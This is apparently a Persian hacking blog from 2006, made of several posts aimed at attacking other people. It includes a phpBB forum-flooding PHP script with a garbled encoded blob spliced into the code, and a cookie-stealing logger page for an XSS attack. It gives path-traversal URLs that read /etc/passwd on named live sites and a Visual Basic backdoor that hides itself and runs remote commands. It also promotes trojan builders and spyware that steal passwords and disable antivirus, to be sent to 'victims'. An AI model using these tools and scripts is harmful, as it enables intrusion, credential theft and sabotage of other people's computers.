یکی از روم های یاهو وارد شوید. هر کدام که دوست داشتید. پس از ورود به روم انتخابی کافی است دستور زیر را در قسمت Type Massage وارد کنید: goto ID/ در دستور فوق به جای عبارت ID باید آیدی مورد نظرتان را بنویسید. اکنون Enter بزنید. حالا منتظر بمانید تا به طور اتوماتیک به رومی که دوستتان درش هست وارد شوید. به عنوان مثال ما قصد داریم بفهمیم دوستمان که آیدی او spy_group_m است در کدام یک از روم های مشغول چت کردن است. برای این کار پس از وارد شدن به یکی از روم های یاهو دستور زیر را وارد کرده و Enter میزنیم: goto spy_group_m/ اکنون به طور اتوماتیک وارد رومی میشویم که spy_group_m در آن حاضر است. به این نکته نیز دقت کنید که ممکن است پس از وارد نمودن دستور مورد نظر با پیغام خطای !User Is Not Singed in Chat روبرو شویم ؛ این پیغام بدین معنا است که: آیدی که وارد کرده اید اصلا در هیچ یک از چت روم ها حاضر نیست! یا آیدی مورد نظر شما در چت رومی هست که ظرفیت آن تکمیل است و امکان ورود شما وجود ندارد ، بهتر است مجدد سعی کنید. ******************************************* تلفن سندر برنامه اي است كه توسط تيم کوروی هكر نوشته شده است كه براي پيدا كردن شما تلفن افراد در اينترنت مي باشد. اين برنامه از 3 ورژن تشكيل مي شود كه ورژن اول اين برنامه براي دانلود گذاشته شده است  و100 % كار مي كند ولی باید برای اجرا حتما به اینترنت وصل باشید. براي ديدن اموزش بر روي ادامه مطلب كليد كنيد آموزش: برنامه را دانلود كنيد و سپس ان را از حالت zip شده در اوريد و فايل Edit - server  را اجرا كنيد.  در كادر اول شماره خودتان را وارد كنيد سپس روي دكمه make  كليد كنيد كه يك پيغامي مي دهد كه فايل ساخته شد. سپس فايل server.exe  را براي قرباني بفرستيد  و وقتي قرباني ان را اجرا كرد و بعد از اينترنت قطع شد  با شماره تلفن خونه قرباني به شماره كه در edit - server  داده ايد  زنگ مي خورد و شماره قرباني براي شما مي افتد. دریافت برنامه   نوشته شده در جمعه هفدهم شهریور 1385 ساعت 9:41 بعد از ظهر توسط سناتور امیر [ ] | مطالب مرتبط ( ) | لينک ثابت عکس دلخواه پشت لیست دوستان كارهايی كه گفته مي شود را به ترتيب انجام بدهيد تا بتوانيد از هر عكسی در ياهو مسنجر در پشت ليست دوستهايتان استفاده كنيد. عكسی را كه مي خواهيد استفاده كنيد به فرمت BMP در بياوريد. اسم عكس را به background تغيير نام بدهيد. عكس را به جايی كه ياهو را نصب كرديد به آدرس زير كپی كنيد: C:\Program Files\Yahoo!\Messenger\skins\custom حالا كانكت شويد و اين كارهايی كه نوشته شده به ترتيب انجام بدهيد: yahoo messenger_login_privacy setting_appearance بعد از انجام اين مراحل در صفحه جديدی كه باز مي شود بايد روبروی (كارنت سيم) اين گزينه را انتخاب كنيد Current Theme:Custom. حالا مي توانيد كار را تمام كنيد Apply_ok. نكته: سعی كنيد عكسي را كه در ابتدای كار انتخاب مي كنيد زياد تيره نباشد چون نمي توانيد اسم دوستهايتان را به خوبی ببينيد. نوشته شده در جمعه هفدهم شهریور 1385 ساعت 9:33 بعد از ظهر توسط سناتور امیر [ ] | مطالب مرتبط ( ) | لينک ثابت 2 تا آنتی بوتر دو برنامه آنتی بوت معروف برای یاهو که برنامهء قدرتمندی هستند. YahElite Download       Yazak DownloadY نوشته شده در جمعه هفدهم شهریور 1385 ساعت 9:5 بعد از ظهر توسط سناتور امیر [ ] | مطالب مرتبط ( ) | لينک ثابت phpbb 2.0.19 بمبر با این کد می تونید phpbb 2.0.19 و بقیه رو بمب کنید باید انجمن مورد نظر اجازه ارسال جواب رو به یوزر guest بده (بقیه مدل ها private) خوب این صفحه php رو بردارید و در local هم می شه باش کار کرد مشخصات سایت رو توش بدید و براتون بمب می کنه . بک عالمه مطلب میزاره اینجاست : http://www.irsmg.com/a/php219.txt // this php code work on phpbb 2.0.19 and lower // to work moombing must the forum can reply treade whit guest user // run this code in your server and forum have many guest post from you // coded by hba from all iranian hackers // hamed bazargani (hamed.bazargani@gmail.com) // hba (hamedhack000@yahoo.com) $host='127.0.0.1'; //host url without http $path='phpBB-2.0.19/phpBB2'; //path of the phpbb installed without / the same: phpbb/phpbb/phpbb $i = 100; //number the theread id to start moombing $massage='salam khara'; //text to sabmit form here while ($i <= 400) { //number end of theread id to boombing if (!$fp = @fsockopen($host, 80)){ echo("error"); } else { ?> DdRHsptIAADQq3hnu1gQRFJ5PC4kokRsEdRsppocmiDih9OPD/Hen3//+fMt3xD+UZ51X2C05D8SNOc8+1+Wp0OW//guZ77efGwoKTJ4EzjL2FaFptFhU344oBGh7NzBznbd5tMBOU99 drmSW7EJNMnhHpDHZyFUmjm4nnzFFh7FSZwryolIsl3iR/LyF2Rye3iBA+nGdNk6O8uOOKbbF5m5s2H5nTx5o60EyXawIwPk 4XMgTUHI64fi6c2estDa28g0KvJcoBEMCAluqR80JFyxvCH0FE EBiZDZIBR0Gzth69L6QlmIN0MpZUegiJPnmnQbCJdGXkAGW6Kk 1/EOOMso70QWheiAdVXknCCdvnosL34HuXO0saD7z13dpMlnU15h clZ6dIheh48TfRRDPi8SPwn+1zCUJxIYcJjBE4QWEsn0VVq4i9 SFsUAbLxV/b9/gIL7shpAllPV7ZhNQKF6iOVHXaJNr3d822/uQejYKNrr0MtqBlLhKJhF0OUC35hFuO0FhIezV3u/4to2VINxFro8znodRwFRsGCp2ePfi4i5X1jlCldBZ1bgNdaY4v f0u4St3vWntNI/F25qlpaZYNKL4M5foYNyZ1g4Hr3aWS3JKVIe0jV2OeC75a5om0 4kWPSrnFKBwK9UgAeq5lx9DC5Ntaey0e6xmmPZhG42v2F5iY7z oF6bIH1Xm4zcZzU8NU7LvEJQuPAL2IFuiaNHt0niBmcadmTpjZ hFYeWTD5HuQ+8ic2KCaiHMFsCMpG8Lm29eDN3DjdUkXbAFO5qU NpGTZPzEkz2F/Q7me7DzEiVvZcX/TzzQufBgNOQksQxEKGd/1DQHR54pkduzolIWu8e3s0vl7y41v/XY92O69g5l6RM5q2iKTxTGGFRquJ0Wg1tu1aMzRa27ei14A2NJ PwbpT73qtnlX8RTON8XipdZaO57A2xIYZiyZNGqpOooD8NQp+T UPRng4AmFZoKlj2zT4HbGnejga2i6jaFrailCi9Z+3kH3ZZsdx qzvs1LIupaxLYq/JSYM003fw6eGdU6FoNay6anne5t6+6XjgkF/tJLWUSFUqkT5OOmrARuqoKvy1W/rCyBsWuy1lmjQOC345nH4CLXsZYX4UUt/nz2N1wZU5349yh4ARQ+1VPUu+c4wuzFBzHcK39EQyf2KFAPf1F ob2uVdMZvHCYDuqKXB1uqzzcS549jhteG4ckXYEntmmiycIVXV bff//+/vPnz1/f/vwN6n8='))); ?> $query_str = 'subject=boombing&message='.$ms.'&topictype=0&mode=reply&t='.$i.'&post=Submit'; $output = "POST /$path/posting.php HTTP/1.0\n"; $output .= "Host: $host\n"; $output .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.5) Gecko/20031007\n"; $output .= "Accept: application/x-shockwave-flash,text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1\n"; $output .= "Accept-Language: ru,en;q=0.8,en-gb;q=0.5,en-us;q=0.3\n"; $output .= "Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7\n"; $output .= "Keep-Alive: 300\n"; $output .= "Referer: http://$host/$path/posting.php\n"; $output .= "Content-Type: application/x-www-form-urlencoded\n"; $output .= "Content-Length: ".strlen($query_str)."\n"; $output .= "Connection: keep-alive\n\n"; $output .= $query_str; fputs($fp, $output); while(!feof($fp)){ $recieved .= fgets($fp, 500); } } $i++; sleep(1); } ?> نوشته شده در جمعه هفدهم شهریور 1385 ساعت 8:47 بعد از ظهر توسط سناتور امیر [ ] | مطالب مرتبط ( ) | لينک ثابت php bb2.018 phpBB XSS Cookie Disclosure Proof of Concept 2.0.18 کد phpbb .فایلی را که محتوای آن کد زیر است را در مسیر مانند زیر سیو میکنیم. 'http://www.site.com/cookie/c.php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $date=date("m/d/Y g:i:s a"); $referer=getenv ('HTTP_REFERER'); $fl = fopen('log.txt', 'a'); fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n"); fclose($fl); ?> .حال کافیست فایلی که در بالا با رنگ قرمز نشان داده است را باز کنید نوشته شده در جمعه هفدهم شهریور 1385 ساعت 8:44 بعد از ظهر توسط سناتور امیر [ ] | مطالب مرتبط ( ) | لينک ثابت هک کردن php bb2.01 phpBB XSS Cookie Disclosure Proof of Concept 2.0.18 کد phpbb .فایلی را که محتوای آن کد زیر است را در مسیر مانند زیر سیو میکنیم. 'http://www.site.com/cookie/c.php $cookie = $_GET['c']; $ip = getenv ('REMOTE_ADDR'); $date=date("m/d/Y g:i:s a"); $referer=getenv ('HTTP_REFERER'); $fl = fopen('log.txt', 'a'); fwrite($fl, "\n".$ip.' :: '.$date."\n".$referer." :: ".$cookie."\n"); fclose($fl); ?> .حال کافیست فایلی که در بالا با رنگ قرمز نشان داده است را باز کنید نوشته شده در جمعه هفدهم شهریور 1385 ساعت 8:43 بعد از ظهر توسط سناتور امیر [ ] | مطالب مرتبط ( ) | لينک ثابت باگ http://www.milw0rm.com/id.php?id=659 چند نمونه سایتی که این باگ را دارند : http://host236.ipowerweb.com/~robertsl/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html ------------------ http://www.naturesgoodness.com.au/cgi-bin/loadpage.cgi?user_id=id&file=.|./.|./.|./.|./.|./etc/passwd%00.html اکسپلویت LiteForum 2.1.1 sql injection exploit اکسپلویش با پرل هست اینم لینک اکسپلویت : http://www.milw0rm.com/id.php?id=786 :eek:   EkinBoard 1.0.3 (config.php) SQL Injection / Command Execution Exploit این باگ تو نرم افزار معروفی هست که با php طراحی شده. و اکسپلویت کاریی براش نوشتن لینک اکسپلویت: http://www.milw0rm.com/id.php?id=1329     AzDGDatingLite <= 2.1.3 Remote Code Execution Exploit سیستم دوستیابی که با php نوشته شده !! لینک اکسپلویت: http://www.milw0rm.com/id.php?id=1214         نوشته شده در جمعه هفدهم شهریور 1385 ساعت 8:42 بعد از ظهر توسط سناتور امیر [ ] | مطالب مرتبط ( ) | لينک ثابت  داشتم از سایت WwW.IrPcDot.CoM بازدید می کردم دیدم نرم افزار های جالبی داره .گفتم حیفه کسی ازش خبری نداشته باشه  نرم افزار Power-Spy یکی از قوی ترین نرم افزار های جاسوسی و هک است که توسط تیم برنامه نویسی سایت  WwW.IrPcDot.CoM YasSOFT Group طراحی شده.از امکانات آن می توان به : 1-ارسال تمامی پسورد های یاهو 7.5 و 8 2-ارسال تمامی متون تایپ شده به همراه محل تایپ آنها توسط قربانی  3-ارسال IPو نام سیستم عامل و نام کاربری قربانی 4-ارسال پسورد و یوزر و شماره تلفن اتصال به شبکه  5-تغییر کلمه عبور ویندوز به کلمه دلخواه برای مشاهده لینک دانلود و سایر توضیحات بر روی ادامه متن کلیک کنید.  6-غیرفعال کردن Msconfig,Regedit,Gpedit,TaskMan  7-ارسال ایمیل با دور زدن تمامی فایروال ها و سیستم های امنیتی 8-حجم کم سرور دانلود نرم افزار Power Spy    ـــــــــــــــــــــــــــــــــــــــــــــــــــــــــــ   برای ا ستفاده از این نرم افزار کافیست آنرا دانلود کرده از فایل زیپ بیرون بیاورید سپس Setup.bat را اجرا نموده و بعد از کامل شدن نصب می توانید فایل Yahoo-bug.exe را اجرا کنید و از آن استفاده کنید. کارکرد این برنامه اینگونه است که بعد از اجرای آن باید یک IDوPassword یاهو را در آن وارد کنید سپس دکمه Login را بزنید تا برنامه به سرور یاهو وصل شود بعد از اتصال در قسمت Victim ID ای دی قربانی را وارد کنید و بعد دکمه ی Kill him را بزنید. دانلود نرم افزار Yahoo Bug باحجم ۸۷۷ کیلو بایت برای تمام ویندوزها  دانلود نرم افزار Yahoo Bug برای Win XPبا حجم ۱۶۰ کیلوبایت    نوشته شده در جمعه هفدهم شهریور 1385 ساعت 8:34 بعد از ظهر توسط سناتور امیر [ ] | مطالب مرتبط ( ) | لينک ثابت webchk یه برنامه برای هک کردن سایت با امکانات متنوع از جمله دارابودن ۵۰باگ و پزیرش اکسپلویت جدید. دانلود   نوشته شده در جمعه هفدهم شهریور 1385 ساعت 8:19 بعد از ظهر توسط سناتور امیر [ ] | مطالب مرتبط ( ) | لينک ثابت ثبت پسوردهای اینترنتی مختلف تایپ شده در یک شبکه ی داخلی  شاید با خبر شدن از کلمات عبور استفاده شده ی مختلف توسط کاربران مختلف در یک شبکه ی خانگی و Local برای شما نیز جالب باشد . Ace Password Sniffer نرم افزاری جالب و مفید از شرکت نرم افزاری EffeTech است که به کاربر امکان آن را می دهد تا به گونه ای متفاوت و موثر از تمامی رمزهای عبور اینترنتی سیستم های یک شبکه ی داخلی آگاه شود . این نرم افزار با زیر نظر گرفتن و به اصطلاح گوش دادن به پورت های مرتبط با پسوردی چون http, ftp, smtp, pop3, telnet پسوردهای داده شده با آنها را ثبت و برای شما ذخیره می نماید و به آسانی پس از اینکه پسورد در شبکه وارد شد شما قادر به مشاهده ی آن خواهید بود ! از ویژگی های دیگر این نرم افزار می شود به بی توجهی آن به ترافیک شبکه و اینترنت اشاره کرد که کار خود را بدون ایجاد ترافیک اینترنتی انجام می دهد . Ace Password Sniffer برای نصب به هیچ برنامه ی جانبی نیاز ندارد .  دانلود کنید نسخه ی 1.2 را با حجم 0.7 مگابایت             کرک نوشته شده در پنجشنبه بیست و پنجم خرداد 1385 ساعت 11:29 قبل از ظهر توسط سناتور امیر [ ] | مطالب مرتبط ( ) | لينک ثابت TAK ps       Tak-PS « سازنده تروجان » بسیاری از دوستان از من نرم افزاری برای ساخت تروجان رو درخواست کرده بودند !! اگر کمی دیر شد معذرت میخوام ! نرم افزار Tak-PS که توسط آقای مهدی به وسیله Delphi 7 نوشته شده، میشه گفت در حال حاضر یکی از قدرتمندترین و کاربردی ترین نرم افزار ساخت تروجان هست که هیچ آنتی ویروسی آن را تشخیص نمیدهد ! بعضی خصوصیات و قابلیت های این نرم افزار عبارتند از : - فرستادن پسورد آیدی یاهو مسجر حتی نسخه 7 - فرستادن Username و Password در Dial-UP Connection - فرستادن IP Address - غیر فعال کردن Regedit - غیر فعال کردن Task Manager - ایجاد پیغام خطا - ایجاد آیکون عکس و قلب - و... سریال برنامه: www.haak.blogfa.com   دانلود حجم663 کیلوبایت دانلود کرک وآموزش کار با این برنامه سایت سازنده نوشته شده در پنجشنبه بیست و پنجم خرداد 1385 ساعت 11:23 قبل از ظهر توسط سناتور امیر [ ] | مطالب مرتبط ( ) | لينک ثابت آنتی اسپای شركت نرم افزار Sunbelt Software يكي از توليد كنندگان و شركت هاي پيشرو در ساخت نرم افزار قدرتمند امنيتي ضد جاسوس و مقابله انواع اين نوع جاسوس ها و ابزارهاي مخرب است . محصول قدرتمند اين شركت CounterSpy نام دارد كه نامش در ميان چند نرم افزار Anti-Spy مطرح جهان است و به عقيده ي عده اي حتي اين نرم افزار ميتواند قدرتمندترين باشد. برخي از ويژگي هاي نرم افزار قدرتمند CounterSpy Enterprise به اين شرح است : ديتا بيس بسيار قدرتمند نرم افزار سرعت بالا , مصرف كم منابع سيستم و به روز بودن توسط تيم قدرتمند شركت Sunbelt . داراي بيش از 35 دسته بندي از پيش شناخته شده در زمينه ي انواع نرم افزار مخرب و ناشناس مي باشد . ديتا بيس اين نرم افزار علاوه بر تيم امنيتي قدرتمند شركت Sunbelt توسط صدها هزار كاربر نرم افزار اطلاع داده و شناخته مي شود . توانايي بالاي بخش Active Protection كه به طور كامل از سيستم به صورت زنده محافظت به عمل مي آورد . مديريت مركزي قدرتمند نرم افزارهاي مخرب و جاسوس به طور كامل . قدرت بسيار بالاتر نسبت به تمامي نرم افزارهاي ويروس كش مطرح دنيا در زمينه ي پيدا كردن و مقابله با جاسوس ها و مخرب ها . برخلاف برخي از نرم افزارهاي ضد جاسوس مطرح دنيا مانند ضد جاسوس شركت مايكروسافت كه در آن چند Adware يافت شده است , CounterSpy  100% پاك است . و ..... دانلود كنيد نسخه ي 1.5.268 را با حجم حدود 14 مگابايت تصويري از محيط نرم افزار کرک برنامه نوشته شده در پنجشنبه بیست و پنجم خرداد 1385 ساعت 11:19 قبل از ظهر توسط سناتور امیر [ ] | مطالب مرتبط ( ) | لينک ثابت یک نرم افزاره که می تونه یک ویروس با قابلیت ها یی که شما انتخاب می کنید درست کنه . شما می تونید این ویروس رو به کسی که می خواین اذیتش کنین بفرستین . در ضمن Cv مخفف Custimized Virus هست . قابلیت های برنامه : 1-راه اندازی در StartUp (بدون نمایش در Msconfig) 2-غیر فعال کردن TaskMgr,Msconfig,Regedit,Norton Anti Virus,Mcafee Antivirus,Windows Firewall 3-قابلیت تعیین نام ویروس بعد از Install 4-پشتیبانی از پسوند ها مهم فایل های اجرایی مانند : exe , scr, bat , cmd , pif 5-قابلیت انتخاب Icon ویروس 5-پیغام خطای کاذب ( Fake Message ) 6-قابلیت بخشیدن قربانی به 2 صورت 7-قابلیت های آزار قربانی مانند : پر کردن هارد ، بوق زدن ! ، کم کردن سرعت کامپیوتر ، و .... 8- حجم بسیار کم : 10-9 کیلوبایت آموزش استفاده از برنامه : برنامه رو اجرا کنید و در صفحه ی About روی Ok کلیک کنید خوب تو صفحه ی اصلی بخش اول یعنی General Settings واضحه و معمولا تو بیشتر Ps ها هم هست .بخش Exe Icon & Name هم که واضحه و به نام و Icon ویروس قبل از اینکه نصب شه اشاره داره بخش Fake Message هم که برای گذاشتن پیغام خطا هست . بخش Forgive Victim : این بخش واسه انتخاب گزینه هایی برای تنظیم بخشش یا عدم بخشش قربانی هست . خوب شما اینجا سه تا گزینه می بینید : الف : Forgive victim with this password : با انتخاب این گزینه اون قربانی که ویروس تو کامپیوترش اینستال شده با فشار دادن Alt + Ctrl + Del صفحه ای رو می بیینه که ازش یک رمز می خواد اگه قربانی اون رمزی رو که شما در روبه روی این گزینه وارد کردید رو وارد کنه . ویروس غیر فعال می شه . ب : Forgive victim after a restart : با انتخاب این گزینه ویروس بعد از یک ریستارت غیر فعال می شه . چ : Don't forgive victim : با انتخاب این گزینه ویروس به هیچ وجه غیر فعال نمیشه . حالا می رسیم به بخش Enable & Disable Viruses : تو این بخش شما می تونید قسمت های مختلف آزار قربانی خودتان رو در ویروس فعال یا غیر فعال کنید . شرح قسمت ها مختلف : 1-Gardually decrease system speed : اگه این گزینه انتخاب بشه ویروس به تدریج سرعت سیستم رو کم می کنه تا جایی که .... . 2-Gradually fill the hard : اگه این گزینه انتخاب بشه ویروس به تدریج هارد رو پر می کنه تا جایی که .... . 3-Disable Yahoo! Messenger : اگه این گزینه انتخاب بشه ویروس یاهو مسنجر رو غیر فعال می کنه ! 4-Beep every second : اگه این گزینه انتخاب شه ویروس هر ثانیه بوق می زنه ! 5-Swap mouse buttons every 30 seconds for 10 seconds : اگه این گزینه انتخاب شه ویروس هر 30 ثایه به مدت 10 ثانیه جای دکمه های ماوس رو عوض می کنه ! 6-Shutdown computer every 20 minutes : اگه این گزینه انتخاب شه ویروس بعد از 20 دقیقه که از روشن شدن کامپیوتر / اجرا شدن ویروس بگذره سیستم قربانی رو شات داون می کنه . 7-Lock Computer Every 30 seconds for 10 seconds : اگه این گزینه انتخاب شه ویروس هر 30 ثانیه به مدت 10 ثانیه کامپیوتر رو قفل می کنه . وقتی همه ی تنظیمات رو انجام دادید روی Create Virus کلیک کنید فایل ویروس به نامی که شما در قسمت Exe name وارد کردید در پوشه ای که برنامه توش اجرا شده ساخته می شه. موفق باشید                        برای گرفتنtoxic-cv اینجا کلیک کنید  منبع:هکایدی نوشته شده در پنجشنبه بیست و پنجم خرداد 1385 ساعت 10:48 قبل از ظهر توسط سناتور امیر [ ] | مطالب مرتبط ( ) | لينک ثابت ساخت تروجان درخواستی این جانب نویسنده این مقاله هیچ مسئولیتی در قبال استفاده شما از مطالب این مقاله را بر عهده نمی گیرم زیرا این مقاله فقط جنبه آموزشی دارد و در صورتی که با این موضوع موافق نیستید از خواندن ادامه این مقاله پرهیز کنید . خوب , اگه دنبال یه مقاله خوب واسه تروجان نویسی با ویژوال بیسیک 6 هستید فکر میکنم مقاله خوبی پیش روی شماست البته این مقاله خیلی مختصر هستش ولی اگه در آینده وقتشو داشتم یه مقاله مفصل در این باره مینویسم . بزارید این اول یه توضیح مختصری در مورد تروجان بدم و اینکه تروجانها چطوری کار میکنند . یه تروجان یا بهتره بگم یک اسب تروجان کامپیوتری مثل یه برنامه ساده هستش که ازش انتظار انجام کار خاصی رو میشه ولی در اصل اون برنامه کارهای مخفیه دیگه ای رو انجام میده . خیلی ساده هدف ما اونو دانلود میکنه به گمان اینکه یه برنامه خوب باشه مثلا یه بازی جذاب ولی وقتی اونو اجرا میکنه تروجان مثل یه سرور شروع به کار میکنه حالا اینکه سرور چیه فکر نمی کنم به موضوع این مقاله زیاد ربطی داشته باشه ولی به عنوان یک تعریف ساده میشه گفت برنامه ای که پاسخ گوی درخواستها باشه رو بهش میگن سرور . خوب حالا یه تروجان چطوری کار میکنه ؟ ما دو تا فایل داریم که یکیش سرور هستش و یکی هم کلاینت که کار این کلاینت درخواست کردن هستش حالا درخواست چی ؟ دیگه دیگه ...!!! این سرور همون فایلی هستش که ما واسه هدفمون می فرستیم و این کلاینت مرکز کنترل سرور هستش . این سرور و کلاینت برای ایجاد ارتباط با هم نیاز به یه کنترلی دارند به نام winsock . winsock یکی از کنترل های ویژوال بیسیک هستش که اجازه ارتباط میان کامپیوتر ها رو به ما میده . مثلا فکر کنید که ما دستور خاموش کردن رو به سرور میفرستیم . این وینساک به ما کمک میکنه تا اطلاعات رو از کامپیوتر خودمون به سرور بفرستیم . خوب حالا اونور داستان وقتی اطلاعات به کامپیوتر هدف رسید اونجا یه سوراخی هستش که به سرور میگه این بچه دباره کرمش گرفته کامپیوتر این بد بخت رو خاموش کنه و سرور هم به کامپیوتر هدف میگه که خاموش شه و اون بدبختم که احتمالا 24 ساعته که روشنه از خدا خواسته ... حالا دیگه داستان تعریف کردن بسه بریم سر اصل مطلب این کد هایی که این زیر مشاهده میکنید کدهای فایل server.exe هستش . توجه کنید که شما به کنترل وینساک نیاز دارید پس دکمه های Ctl + T رو باهم فشار دهید و از پینجره ای که باز میشه دنبال Microsoft Winsock Control 6.0 بگردین . بعد از اضافه کردن اسمشو بزارید winsock1 . خوب حالا بیاید ببینیم این کدها چیکار میکنند Private Sub Form_Load()  Me.Hide  If Winsock1.State <>; sckClosed Then Winsock1.Close  Winsock1.LocalPort = 3333  Winsock1.Listen  Shell ("explorer http://www.yoursite/log.php") End Sub        Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)  If Winsock1.State <> sckClosed Then Winsock1.Close  Winsock1.Accept requestID End Sub   Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long)  Dim data As String  Winsock1.GetData data  Shell data, vbNormalFocus End Sub     me.hide اگه کسی ندونه این چیه که خیلی باحاله If Winsock1.State <> sckClosed Then Winsock1.Close وقتی صفحه لود میشه همه ارتباط های مربوط به وینساکمونو میبنده Winsock1.LocalPort = 3333 پورت وینساک رو تنظیم میکنه یعنی از این پورت میشه بهش کانکت شد Winsock1.Listen خوب حالا وینساک گوش به زنگ میمونه تا یکی بهش کانکت شه Shell ("explorer http://www.yoursite/log.php") این یه کد اختیاری برای فهمیدن آدرس های فعال میشه از روشهای دیگه ای آیپی هدف رو در اختیار خودمون قرار بدیم Private Sub Winsock1_ConnectionRequest(ByVal requestID As Long)درخواست ارتباط رو فعال میکنه If Winsock1.State <> sckClosed Then Winsock1.Close Close اگه ارتباطی فعال باشه اونو قطع میکنه Winsock1.Accept خوب حالا ارتباط مورت تائید قرار میگیره Private Sub Winsock1_DataArrival(ByVal bytesTotal As Long) وقتی داده ای بیاد فعال میشه مثل وقتی که دستوری بفرستیم واسش Dim Data As String خوب حالا یه متغیر تعریف کردیم Winsock1.GetData Data خوب حالا داده ها که همون دستورات هستند رو دریافت میکنیم Shell data, vbNormalFocus به به اینهمه زور زدیم که به همین جا برسیم حالا داده های رسیده مثل یه دستور اجرا میشه مثلا اگه بنویسیم shutdown -s -t 10 و ارسال کنیم کامپیوتر قربانی بعد از مدت 10 ثانیه خاموش میشه خوب حالا نوبت کلاینت هستش . کد زیر کد فایل client.exe هستش که توی فرممون نیاز به یه دونه وینساک به نام winsock1 و سه تا تکست باکس به نام های textbox 1 , textbox2 , twxtbox3 و همچنین 2 تا کامند باتن به نامهای command1 , command 2 داریم Private Sub Command1_Click()  Winsock1.RemotePort = Text2.Text  Winsock1.RemoteHost = Text1.Text  Winsock1.Connect End Sub   Private Sub Command2_Click()  Winsock1.SendData Text3.Text End Sub   Private Sub Form_Load()  If Winsock1.State <> sckClosed Then Winsock1.Close End Sub   Private Sub Winsock1_Connect()  msgbox ("Connected!") End Sub   Private Sub Winsock1_Error(ByVal Number As Integer, Description As String,  ByVal Scode As Long, ByVal Source As String, ByVal HelpFile As String,  ByVal HelpContext As Long, CancelDisplay As Boolean)  MsgBox ("Error!" + vbCrLf + Description), vbCritical, "Winsock error" End Sub       خوب حالا ببینیم این کدها چیکار میکنند Private Sub Command1_Click() وقتی کامند 1 کلیک میشه اجرا میشه Winsock1.RemotePort = Text2.Text پورت کامپیوتر قربانی به اون چیزی که توی تکستباکس 2 نوشته شده تنظیم میشه Winsock1.RemoteHost = Text1.Text آدرس کامپیوتر قربانی رو به اونچیزی که توی تکستباکس 1 نوشته شده تنظیم میکنه Winsock1.Connect جهت ایجاد ارتباط با هدف شروع به تلاش کردن میکنه Private Sub Command2_Click() وقتی کامند 2 فشرده میشه Winsock1.SendData Text3.Text داده های درون تکستباکس 3 رو برای کامپیوتر هدف ارسال میکنه Private Sub Form_Load() When client started If Winsock1.State <> sckClosed Then Winsock1.Close وقتی فرم لود میشه اگه وینساک مون ارتباط فعالی داشده باشه اونو قطع میکنه Private Sub Winsock1_Connect() وقتی وینساک کانکت میشه msgbox ("Connected!") ایجاد ارتباط رو اعلام میکنه Private Sub Winsock1_Error(...) وقتی خطایی رخ بده MsgBox ("Error!" + vbCrLf + Description), vbCritical, "Winsock error" خطا اعلام میشه خیلی ساده بود نه؟ اگه دیدم که این مقاله مورد علاقه قرار گرفت شاید قسمت دومش رو هم بنویسم البته خیلی عمقی تر و پیشرفته تر از یه تروجان ساده داس . منبع:گروه پرن   نوشته شده در پنجشنبه بیست و پنجم خرداد 1385 ساعت 10:42 قبل از ظهر توسط سناتور امیر [ ] | مطالب مرتبط ( ) | لينک ثابت :: كنترل از راه دور سيستم با نرم افزاري ايراني و متفاوت تحت عنوان TroMessenger 1.1 :: براي مديريت از راه دور سيستم ها نرم افزارهاي متعدد و مختلفي عرضه شده اند كه هر كدام توانايي ها و قابليت هاي گوناگوني دارند و اكثر آنها پس از اتصال به سيستم مي بايستي از طريق محيط خود نرم افزار كنترل شوند . TroMessenger  نام نرم افزاري ايراني منحصر به فرد و متفاوتيست كه كه توسط دوست خوبمون محمد عزيز نوشته شده و به صورت رايگان عرضع شده است و به شما امكان گرفتن كامل كنترل يك شخص را از طريق ياهو مسنجر سيستم به دست گيريد . به اين تريتيب شما با سيستم طرف مي توانيد به صحبت بپردازيد و دستورات تعريف شده ي نرم افزار را به آن داده و اطلاعات مورد نظر را دريافت نماييد . به عبارتي سيستم شخص كه